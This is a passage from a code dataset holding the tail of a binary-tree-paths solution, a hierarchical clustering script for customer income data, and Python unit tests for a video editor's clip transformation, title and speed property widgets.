str(x.val)\n s += tmp\n sol.append(s)\n\n for x in [node.left, node.right]:\n curr.append(x)\n __dfs__(x, curr)\n curr.pop()\n\n curr = [root]\n __dfs__(root, curr)\n return sol\n","repo_name":"pagenotfound4o4/py_leetcode","sub_path":"tree/binary-tree-paths.py","file_name":"binary-tree-paths.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"39187459555","text":"import pandas as pd\r\n\r\ndata = pd.read_csv(\"C:/Users/Jeffr/Desktop/Intern - Pantech Solutions/Days/Day 20/20_ClusterringIncomeSpentusingHierarchialClusterring/dataset.csv\")\r\ndata\r\n\r\ndata = data.drop([\"CustomerID\"],axis=1)\r\nprint(data.shape)\r\nprint(data.head())\r\nprint(data.describe())\r\n\r\nprint(data.isnull().sum())\r\n\r\n#Label Encoding\r\n\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabel_encoder = LabelEncoder()\r\ndata[\"Gender\"] = label_encoder.fit_transform(data[\"Gender\"])\r\n\r\nprint(data[\"Gender\"])\r\n\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nmodel = AgglomerativeClustering(n_clusters=5, affinity=\"euclidean\", linkage=\"average\")\r\ny_means = model.fit_predict(data)\r\ny_means\r\n\r\nimport matplotlib.pyplot as plt\r\nimport scipy.cluster.hierarchy as cluster\r\n\r\nplt.figure(1, figsize=(16,8))\r\ndendrogram = cluster.dendrogram(cluster.linkage(data, method=\"ward\"))\r\n\r\nplt.title(\"Dendrogram Tree Graph\")\r\nplt.xlabel(\"Customers\")\r\nplt.ylabel(\"Distances\")\r\nplt.show()\r\n\r\n\r\nX = data.iloc[:,[2,3]].values\r\nX\r\n\r\n\r\nplt.scatter(X[y_means==0,0], X[y_means==0,1], s=50, c=\"purple\", label = \"Cluster 
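# Editor's note (hedged): in scikit-learn >= 1.2 the 'affinity' keyword of
# AgglomerativeClustering is deprecated (removed in 1.4) in favour of 'metric':
# model = AgglomerativeClustering(n_clusters=5, metric="euclidean", linkage="average")
# Note also that the flat clustering above uses linkage="average" while the
# dendrogram is drawn with method="ward"; using the same linkage in both keeps
# the tree consistent with the cluster labels.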
1\")\r\nplt.scatter(X[y_means==1,0], X[y_means==1,1], s=50, c=\"blue\", label = \"Cluster 2\")\r\nplt.scatter(X[y_means==2,0], X[y_means==2,1], s=50, c=\"red\", label = \"Cluster 3\")\r\nplt.scatter(X[y_means==3,0], X[y_means==3,1], s=50, c=\"yellow\", label = \"Cluster 4\")\r\nplt.scatter(X[y_means==4,0], X[y_means==4,1], s=50, c=\"cyan\", label = \"Cluster 5\")\r\n\r\nplt.title(\"Income Spent Analysis - Hierarchial Clustering\")\r\nplt.xlabel(\"Income\")\r\nplt.ylabel(\"Spent\")\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"jeffryjames/Machine_Learning","sub_path":"Unsupervised Learning/Hierarchial Clustering_Income_spent_analysis.py","file_name":"Hierarchial Clustering_Income_spent_analysis.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15438840119","text":"import tempfile\nfrom unittest import mock\n\nfrom gi.repository import GES\nfrom gi.repository import Gst\n\nfrom tests import common\n\n\nclass TransformationPropertiesTest(common.TestCase):\n \"\"\"Tests for the TransformationProperties widget.\"\"\"\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_spin_buttons_read(self):\n \"\"\"Checks the spin buttons update when the source properties change.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n\n # Check that spin buttons display the correct values by default\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertIn(prop, spin_buttons)\n ret, source_value = source.get_child_property(prop)\n self.assertTrue(ret)\n spin_btn_value = spin_buttons[prop].get_value_as_int()\n self.assertEqual(spin_btn_value, source_value)\n\n # Change the source properties and check the spin buttons update\n # correctly.\n new_values = {\"posx\": 20, \"posy\": -50, \"width\": 70, \"height\": 450}\n for prop, new_val in new_values.items():\n self.assertTrue(source.set_child_property(prop, new_val))\n spin_btn_value = spin_buttons[prop].get_value_as_int()\n self.assertEqual(new_val, spin_btn_value)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_clip_size_aspect_ratio_lock(self):\n \"\"\"Checks if aspect ratio is maintained when clip size is linked.\"\"\"\n # Add a clip and select it\n clip = self.add_clips_simple(self.timeline_container.timeline, 1)[0]\n self.timeline_container.timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n self._check_aspect_ratio_constraining(source, initial_size=(960, 400), width=1440, height=None, expected_width=None, expected_height=600)\n self._check_aspect_ratio_constraining(source, initial_size=(320, 240), width=None, height=720, expected_width=960, expected_height=None)\n self._check_aspect_ratio_constraining(source, initial_size=(100, 100), width=25, height=None, expected_width=None, expected_height=25)\n\n def _check_aspect_ratio_constraining(self, source, initial_size, width, height, expected_width, expected_height):\n width_spin = self.transformation_box.spin_buttons[\"width\"]\n height_spin = self.transformation_box.spin_buttons[\"height\"]\n width_spin.set_value(initial_size[0])\n height_spin.set_value(initial_size[1])\n\n # Lock the aspect ratio.\n 
self.clipproperties.transformation_expander._aspect_ratio_button_clicked_cb(None)\n self.assertIsNotNone(self.clipproperties.transformation_expander._aspect_ratio)\n\n # Make a change to one of the spin button's value.\n if width is not None:\n width_spin.set_value(width)\n expected_width = width\n if height is not None:\n height_spin.set_value(height)\n expected_height = height\n self.assertEqual(source.get_child_property(\"width\"), (True, expected_width))\n self.assertEqual(source.get_child_property(\"height\"), (True, expected_height))\n\n # Unlock the aspect ratio.\n self.clipproperties.transformation_expander._aspect_ratio_button_clicked_cb(None)\n self.assertIsNone(self.clipproperties.transformation_expander._aspect_ratio)\n\n # Change the width independently.\n width_spin.set_value(expected_width * 2)\n self.assertEqual(source.get_child_property(\"width\"), (True, expected_width * 2))\n self.assertEqual(source.get_child_property(\"height\"), (True, expected_height))\n\n # Change the height independently.\n height_spin.set_value(expected_height * 4)\n self.assertEqual(source.get_child_property(\"width\"), (True, expected_width * 2))\n self.assertEqual(source.get_child_property(\"height\"), (True, expected_height * 4))\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_spin_buttons_write(self):\n \"\"\"Checks the spin buttons changing updates the source properties.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n # Get current spin buttons values\n current_spin_values = {}\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n current_spin_values[prop] = spin_buttons[prop].get_value_as_int()\n\n changes = [\n (\"posx\", -300), (\"posy\", 450), (\"width\", 1), (\"height\", 320),\n (\"posx\", 230), (\"posx\", 520), (\"posy\", -10), (\"posy\", -1000),\n (\"width\", 600), (\"width\", 1000), (\"height\", 1), (\"height\", 1000)\n ]\n\n # Change the spin buttons values and check the source properties are\n # updated correctly.\n for prop, new_value in changes:\n spin_buttons[prop].set_value(new_value)\n current_spin_values[prop] = new_value\n for source_prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n ret, source_value = source.get_child_property(source_prop)\n self.assertTrue(ret)\n self.assertEqual(current_spin_values[source_prop], source_value)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_spin_buttons_source_change(self):\n \"\"\"Checks the spin buttons update when the selected clip changes.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add two clips and select the first one\n clips = self.add_clips_simple(timeline, 2)\n timeline.selection.select([clips[0]])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n # Change the spin buttons values\n new_values = {\"posx\": 45, \"posy\": 10, \"width\": 450, \"height\": 25}\n for prop, new_val in new_values.items():\n spin_buttons[prop].set_value(new_val)\n\n # Select the second clip and check the spin buttons values update\n # correctly\n timeline.selection.select([clips[1]])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n for prop in [\"posx\", \"posy\", \"width\", 
\"height\"]:\n ret, source_value = source.get_child_property(prop)\n self.assertTrue(ret)\n self.assertEqual(spin_buttons[prop].get_value_as_int(), source_value)\n\n # Select the first clip again and check spin buttons values\n timeline.selection.select([clips[0]])\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertEqual(spin_buttons[prop].get_value_as_int(), new_values[prop])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_keyframes_activate(self):\n \"\"\"Checks transformation properties keyframes activation.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n inpoint = source.props.in_point\n duration = source.props.duration\n\n # Check keyframes are deactivated by default\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertIsNone(source.get_control_binding(prop))\n\n # Get current source properties\n initial_values = {}\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n ret, value = source.get_child_property(prop)\n self.assertTrue(ret)\n initial_values[prop] = value\n\n # Activate keyframes and check the default keyframes are created\n self.transformation_box._activate_keyframes_btn.set_active(True)\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n control_binding = source.get_control_binding(prop)\n self.assertIsNotNone(control_binding)\n control_source = control_binding.props.control_source\n keyframes = [(item.timestamp, item.value) for item in control_source.get_all()]\n self.assertEqual(keyframes, [(inpoint, initial_values[prop]),\n (inpoint + duration, initial_values[prop])])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_keyframes_add(self):\n \"\"\"Checks keyframe creation.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n pipeline = timeline._project.pipeline\n spin_buttons = self.transformation_box.spin_buttons\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n start = source.props.start\n inpoint = source.props.in_point\n duration = source.props.duration\n\n # Activate keyframes\n self.transformation_box._activate_keyframes_btn.set_active(True)\n\n # Add some more keyframes\n offsets = [1, int(duration / 2), duration - 1]\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n for index, offset in enumerate(offsets):\n timestamp, value = inpoint + offset, offset * 10\n with mock.patch.object(pipeline, \"get_position\") as get_position:\n get_position.return_value = start + offset\n spin_buttons[prop].set_value(value)\n\n control_source = source.get_control_binding(prop).props.control_source\n keyframes = [(item.timestamp, item.value) for item in control_source.get_all()]\n self.assertEqual((timestamp, value), keyframes[index + 1])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_keyframes_navigation(self):\n \"\"\"Checks keyframe navigation.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n pipeline = timeline._project.pipeline\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n start = 
source.props.start\n inpoint = source.props.in_point\n duration = source.props.duration\n\n # Activate keyframes and add some more keyframes\n self.transformation_box._activate_keyframes_btn.set_active(True)\n offsets = [1, int(duration / 2), duration - 1]\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n for offset in offsets:\n timestamp, value = inpoint + offset, offset * 10\n control_source = source.get_control_binding(prop).props.control_source\n control_source.set(timestamp, value)\n\n # Add edge keyframes in the offsets array\n offsets.insert(0, 0)\n offsets.append(duration)\n\n # Test keyframe navigation\n prev_index = 0\n next_index = 1\n for position in range(duration + 1):\n prev_keyframe_ts = offsets[prev_index] + inpoint\n next_keyframe_ts = offsets[next_index] + inpoint\n\n with mock.patch.object(pipeline, \"get_position\") as get_position:\n get_position.return_value = start + position\n with mock.patch.object(pipeline, \"simple_seek\") as simple_seek:\n self.transformation_box._prev_keyframe_btn.clicked()\n simple_seek.assert_called_with(prev_keyframe_ts)\n self.transformation_box._next_keyframe_btn.clicked()\n simple_seek.assert_called_with(next_keyframe_ts)\n\n if position + 1 == next_keyframe_ts and next_index + 1 < len(offsets):\n next_index += 1\n if position in offsets and position != 0:\n prev_index += 1\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_reset_to_default(self):\n \"\"\"Checks \"reset to default\" button.\"\"\"\n timeline = self.transformation_box.app.gui.editor.timeline_ui.timeline\n\n # Add a clip and select it\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n # Change source properties\n new_values = {\"posx\": 20, \"posy\": -50, \"width\": 70, \"height\": 450}\n for prop, new_val in new_values.items():\n self.assertTrue(source.set_child_property(prop, new_val))\n\n # Activate keyframes\n self.transformation_box._activate_keyframes_btn.set_active(True)\n\n # Press \"reset to default\" button\n clear_button = self.transformation_box.builder.get_object(\"clear_button\")\n clear_button.clicked()\n\n # Check that control bindings were erased and the properties were\n # reset to their default values\n for prop in [\"posx\", \"posy\", \"width\", \"height\"]:\n self.assertIsNone(source.get_control_binding(prop))\n ret, value = source.get_child_property(prop)\n self.assertTrue(ret)\n self.assertEqual(value, source.ui.default_position[prop])\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_operator(self):\n timeline = self.app.gui.editor.timeline_ui.timeline\n\n clip, = self.add_clips_simple(timeline, 1)\n timeline.selection.select([clip])\n source = self.compositing_box._video_source\n self.assertIsNotNone(source)\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n self.compositing_box.blending_combo.set_active_id(\"source\")\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"source\"))\n\n self.compositing_box.blending_combo.set_active_id(\"over\")\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n self.app.action_log.undo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"source\"))\n\n self.app.action_log.undo()\n ret, value = 
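# Editor's note (hedged): test_reset_to_default above drives the real
# "clear_button" widget fetched from the GtkBuilder UI rather than calling a
# private method, then checks two effects at once: every control binding is
# dropped and each property returns to source.ui.default_position[prop].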
source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n self.app.action_log.redo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"source\"))\n\n self.app.action_log.redo()\n ret, value = source.get_child_property(\"operator\")\n self.assertEqual((ret, value.value_nick), (True, \"over\"))\n\n\nclass TitlePropertiesTest(common.TestCase):\n \"\"\"Tests for the TitleProperties class.\"\"\"\n\n def _get_title_source_child_props(self):\n clips = self.layer.get_clips()\n self.assertEqual(len(clips), 1, clips)\n self.assertIsInstance(clips[0], GES.TitleClip)\n source, = clips[0].get_children(False)\n return {p: source.get_child_property(p)\n for p in (\"text\",\n \"x-absolute\", \"y-absolute\",\n \"valignment\", \"halignment\",\n \"font-desc\",\n \"color\",\n \"foreground-color\",\n \"outline-color\",\n \"draw-shadow\")}\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_create_title(self):\n \"\"\"Exercise creating a title clip.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n self.assertTrue(properties1[\"text\"][0])\n self.assertNotEqual(properties1[\"text\"][1], \"\", \"Title clip does not have an initial text\")\n\n self.action_log.undo()\n clips = self.layer.get_clips()\n self.assertEqual(len(clips), 0, clips)\n\n self.action_log.redo()\n properties2 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties2)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_modify_title(self):\n \"\"\"Exercise modifying the title.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n\n # Modify the title.\n mod_title = \"Modifed Title\"\n self.clipproperties.title_expander.textbuffer.props.text = mod_title\n properties2 = self._get_title_source_child_props()\n self.assertEqual(properties2[\"text\"], (True, mod_title))\n self.assertNotEqual(properties1[\"text\"], properties2[\"text\"])\n\n # Undo modify title.\n self.action_log.undo()\n properties3 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties3)\n\n # Redo modify title.\n self.action_log.redo()\n properties4 = self._get_title_source_child_props()\n self.assertDictEqual(properties2, properties4)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_modify_outline_color(self):\n \"\"\"Exercise modifying the outline color.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n\n # Modify the outline color.\n mod_outline_color = 0xFFFFFFFF\n color_button_mock = mock.Mock()\n color_picker_mock = mock.Mock()\n color_picker_mock.calculate_argb.return_value = mod_outline_color\n self.clipproperties.title_expander._color_picker_value_changed_cb(color_picker_mock, color_button_mock, \"outline-color\")\n properties2 = self._get_title_source_child_props()\n self.assertEqual(properties2[\"outline-color\"], (True, mod_outline_color))\n self.assertNotEqual(properties1[\"outline-color\"], properties2[\"outline-color\"])\n\n # Undo modify outline color.\n self.action_log.undo()\n properties3 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties3)\n\n 
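# The title tests above all share one shape: snapshot the child properties,
# mutate one, undo and compare against the first snapshot, then redo and
# compare against the second. A minimal, self-contained sketch of that
# round-trip (the UndoStack below is a hypothetical stand-in, not Pitivi's
# actual action log):

class UndoStack:
    """Tiny command stack; each entry is an (undo_fn, redo_fn) pair."""

    def __init__(self):
        self._done, self._undone = [], []

    def push(self, undo_fn, redo_fn):
        self._done.append((undo_fn, redo_fn))
        self._undone.clear()

    def undo(self):
        pair = self._done.pop()
        pair[0]()
        self._undone.append(pair)

    def redo(self):
        pair = self._undone.pop()
        pair[1]()
        self._done.append(pair)

props = {"outline-color": 0x2F2F2F2F}
stack = UndoStack()

snapshot1 = dict(props)
old_value = props["outline-color"]
props["outline-color"] = 0xFFFFFFFF
stack.push(lambda: props.update({"outline-color": old_value}),
           lambda: props.update({"outline-color": 0xFFFFFFFF}))
snapshot2 = dict(props)

stack.undo()
assert props == snapshot1
stack.redo()
assert props == snapshot2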
# Redo modify outline color.\n self.action_log.redo()\n properties4 = self._get_title_source_child_props()\n self.assertDictEqual(properties2, properties4)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_modify_drop_shadow(self):\n \"\"\"Exercise modifying the drop shadow.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n self.clipproperties.create_title_clip_cb(None)\n properties1 = self._get_title_source_child_props()\n\n # Modify the drop shadow.\n drop_shadow = False\n drop_shadow_checkbox_mock = mock.Mock()\n drop_shadow_checkbox_mock.get_active.return_value = drop_shadow\n self.clipproperties.title_expander._drop_shadow_checkbox_cb(drop_shadow_checkbox_mock)\n\n properties2 = self._get_title_source_child_props()\n self.assertEqual(properties2[\"draw-shadow\"], (True, drop_shadow))\n self.assertNotEqual(properties1[\"draw-shadow\"], properties2[\"draw-shadow\"])\n\n # Undo modify drop shadow.\n self.action_log.undo()\n properties3 = self._get_title_source_child_props()\n self.assertDictEqual(properties1, properties3)\n\n # Redo modify drop shadow.\n self.action_log.redo()\n properties4 = self._get_title_source_child_props()\n self.assertDictEqual(properties2, properties4)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_selection_does_nothing(self):\n \"\"\"Checks de/selection do not create undoable operations.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n self.clipproperties.create_title_clip_cb(None)\n self.assertEqual(len(self.action_log.undo_stacks), 1)\n clips = self.layer.get_clips()\n self.assertEqual(len(clips), 1, clips)\n\n self.timeline_container.timeline.selection.unselect(clips)\n self.assertEqual(len(self.action_log.undo_stacks), 1)\n\n self.timeline_container.timeline.selection.select(clips)\n self.assertEqual(len(self.action_log.undo_stacks), 1)\n\n @common.setup_timeline\n @common.setup_clipproperties\n def test_xxx(self):\n \"\"\"Exercise creating a title clip.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n # Create the first clip.\n self.clipproperties.create_title_clip_cb(None)\n clip1, = self.layer.get_clips()\n source1, = clip1.get_children(False)\n self.clipproperties.title_expander.textbuffer.props.text = \"TC1\"\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n\n # Make place for the second clip at the beginning of the layer.\n clip1.props.start = clip1.props.duration\n\n # Create the second clip.\n self.clipproperties.create_title_clip_cb(None)\n clip2, clip1_ = self.layer.get_clips()\n self.assertIs(clip1_, clip1)\n source2, = clip2.get_children(False)\n self.clipproperties.title_expander.textbuffer.props.text = \"TC2\"\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n\n # Switch back to clip1.\n self.timeline_container.timeline.selection.select([clip1])\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n\n # Switch back to clip2.\n self.timeline_container.timeline.selection.select([clip2])\n self.assertEqual(source1.get_child_property(\"text\"), (True, \"TC1\"))\n self.assertEqual(source2.get_child_property(\"text\"), (True, \"TC2\"))\n\n\nclass ClipPropertiesTest(common.TestCase):\n \"\"\"Tests for the ClipProperties class.\"\"\"\n\n 
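# These tests fake playback state with the standard library's unittest.mock
# instead of spinning up a real GStreamer pipeline: mock.Mock(return_value=0)
# pins pipeline.get_position() to a fixed playhead, and mock.MagicMock()
# stands in for Gdk events. A standalone illustration of the same pattern:

from unittest import mock

pipeline = mock.Mock()
pipeline.get_position = mock.Mock(return_value=0)
assert pipeline.get_position() == 0
pipeline.get_position.assert_called_once_with()

event = mock.MagicMock()          # stands in for a Gdk motion event
event.x, event.y = 0, 0
assert (event.x, event.y) == (0, 0)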
@common.setup_timeline\n @common.setup_clipproperties\n def test_alignment_editor(self):\n \"\"\"Exercise aligning a clip using the alignment editor.\"\"\"\n self.project.pipeline.get_position = mock.Mock(return_value=0)\n\n timeline = self.timeline_container.timeline\n clip = self.add_clips_simple(timeline, 1)[0]\n timeline.selection.select([clip])\n source = self.transformation_box.source\n self.assertIsNotNone(source)\n\n height = source.get_child_property(\"height\").value\n width = source.get_child_property(\"width\").value\n\n self.assertEqual(source.get_child_property(\"posx\").value, 0)\n self.assertEqual(source.get_child_property(\"posy\").value, 0)\n\n alignment_editor = self.transformation_box.alignment_editor\n event = mock.MagicMock()\n event.x = 0\n event.y = 0\n alignment_editor._motion_notify_event_cb(None, event)\n alignment_editor._button_release_event_cb(None, None)\n\n self.assertEqual(source.get_child_property(\"posx\").value, -width)\n self.assertEqual(source.get_child_property(\"posy\").value, -height)\n\n self.action_log.undo()\n\n self.assertEqual(source.get_child_property(\"posx\").value, 0)\n self.assertEqual(source.get_child_property(\"posy\").value, 0)\n\n self.action_log.redo()\n\n self.assertEqual(source.get_child_property(\"posx\").value, -width)\n self.assertEqual(source.get_child_property(\"posy\").value, -height)\n\n\nclass SpeedPropertiesTest(common.TestCase):\n \"\"\"Tests for the TransformationProperties widget.\"\"\"\n\n def assert_applied_rate(self, sources_count, rate, duration):\n self.assertEqual(len(self.speed_box._time_effects), sources_count)\n self.assertEqual(self.speed_box.props.rate, rate)\n self.assertEqual(self.speed_box._clip.props.duration, duration)\n for effect, propname in self.speed_box._time_effects.values():\n self.assertTrue(propname in [\"rate\", \"tempo\"], propname)\n self.assertEqual(effect.get_child_property(propname).value, rate)\n\n self.assertEqual(self.speed_box._speed_adjustment.props.value, rate)\n\n def assert_clip_speed_child_props(self, clip, audio, video, value):\n if audio:\n self.assertEqual(clip.get_child_property(\"tempo\").value, value)\n if video:\n self.assertEqual(clip.get_child_property(\"GstVideoRate::rate\").value, value)\n\n def _check_clip_speed(self, audio=False, video=False):\n sources_count = len([source for source in [audio, video] if source])\n\n clip, = self.layer.get_clips()\n\n duration = self.project.ges_timeline.get_frame_time(self.project.ges_timeline.get_frame_at(Gst.SECOND))\n self.project.ges_timeline.props.snapping_distance = duration\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n self.timeline_container.timeline.selection.select([clip])\n\n self.assertEqual(len(self.speed_box._sources), sources_count, self.speed_box._sources)\n self.assertEqual(self.speed_box._time_effects, {})\n\n clip.props.duration = duration\n self.assertEqual(self.speed_box._clip.props.duration, duration)\n\n self.speed_box._speed_adjustment.props.value = 2.0\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.speed_box._speed_adjustment.props.value = 0.5\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 1.0, duration)\n\n self.action_log.redo()\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.action_log.redo()\n 
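# A note on the assertion just below: after speeding up to 2.0 the duration
# is int(duration / 2), so slowing back down to 0.5 is expected to yield
# int(duration / 2) * 4 rather than duration * 2, because the truncation of
# an odd nanosecond count survives the later rate changes. Quick check:

duration = 1_000_000_001            # an odd number of nanoseconds
halved = int(duration / 2)          # 500_000_000; the trailing .5 is lost
assert halved * 4 == 2_000_000_000  # not duration * 2 == 2_000_000_002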
self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n self.timeline_container.timeline.selection.select([])\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n self.timeline_container.timeline.selection.select([clip])\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 2.0, int(duration / 2))\n\n self.timeline_container.timeline.selection.select([])\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n self.action_log.undo()\n self.assert_clip_speed_child_props(clip, audio, video, 1.0)\n\n self.action_log.redo()\n self.assert_clip_speed_child_props(clip, audio, video, 2.0)\n\n self.action_log.redo()\n self.assert_clip_speed_child_props(clip, audio, video, 0.5)\n\n self.timeline_container.timeline.selection.select([clip])\n total_duration = clip.props.duration\n self.project.pipeline.get_position = mock.Mock(return_value=duration)\n self.timeline_container.split_action.activate()\n\n clip1, clip2 = self.layer.get_clips()\n self.assertEqual(clip1.props.start, 0)\n self.assertEqual(clip1.props.duration, duration)\n self.assertEqual(clip2.props.start, duration)\n self.assertEqual(clip2.props.duration, total_duration - duration)\n self.assertEqual(self.project.ges_timeline.props.snapping_distance, duration)\n\n # 0.1 would lead to clip1 totally overlapping clip2, ensure it is a noop\n self.speed_box._speed_adjustment.props.value = 0.1\n self.assert_applied_rate(sources_count, 0.5, duration)\n self.assertEqual(self.project.ges_timeline.props.snapping_distance, duration)\n\n self.action_log.undo()\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 4)\n\n # Undoing should undo the split\n clip1, = self.layer.get_clips()\n\n # redo the split\n self.action_log.redo()\n clip1, clip2 = self.layer.get_clips()\n self.assertEqual(self.speed_box._clip, clip1)\n self.assert_applied_rate(sources_count, 0.5, duration)\n self.assertEqual(self.project.ges_timeline.props.snapping_distance, duration)\n\n self.speed_box._speed_adjustment.props.value = 1.0\n self.assert_applied_rate(sources_count, 1.0, int(duration / 2))\n\n self.speed_box._speed_adjustment.props.value = 0.5\n self.assert_applied_rate(sources_count, 0.5, int(duration / 2) * 2)\n\n self.speed_box.set_clip(None)\n self.assertEqual(self.speed_box._sources, {})\n self.assertEqual(self.speed_box._time_effects, {})\n\n @common.setup_project_with_clips(assets_names=[\"1sec_simpsons_trailer.mp4\"])\n @common.setup_clipproperties\n def test_clip_speed_av(self):\n self._check_clip_speed(audio=True, video=True)\n\n @common.setup_project_with_clips(assets_names=[\"mp3_sample.mp3\"])\n @common.setup_clipproperties\n def test_clip_speed_a(self):\n self._check_clip_speed(audio=True)\n\n @common.setup_project_with_clips(assets_names=[\"30fps_numeroted_frames_blue.webm\"])\n @common.setup_clipproperties\n def test_clip_speed_v(self):\n self._check_clip_speed(video=True)\n\n @common.setup_project_with_clips(assets_names=[\"mp3_sample.mp3\", \"30fps_numeroted_frames_blue.webm\"])\n @common.setup_clipproperties\n def test_widgets_updated_when_switching_clips(self):\n clip1, clip2 = self.layer.get_clips()\n clip1_duration = clip1.props.duration\n clip2_duration = clip2.props.duration\n\n self.timeline_container.timeline.selection.select([clip1])\n self.assertIs(self.speed_box._clip, clip1)\n self.assert_applied_rate(0, 1.0, clip1_duration)\n\n 
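# The "0.1 would lead to clip1 totally overlapping clip2" check above relies
# on the speed widget refusing any rate whose stretched duration would spill
# over the following clip. A hedged sketch of such a guard (illustrative
# only; not Pitivi's actual clamping logic):

def apply_rate(start, source_duration, rate, next_clip_start):
    """Return the new timeline duration, or None when it must be a no-op."""
    new_duration = int(source_duration / rate)
    if start + new_duration > next_clip_start:
        return None                      # would overlap the next clip
    return new_duration

assert apply_rate(0, 10_000, 0.1, 20_000) is None   # 100_000 > 20_000
assert apply_rate(0, 10_000, 2.0, 20_000) == 5_000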
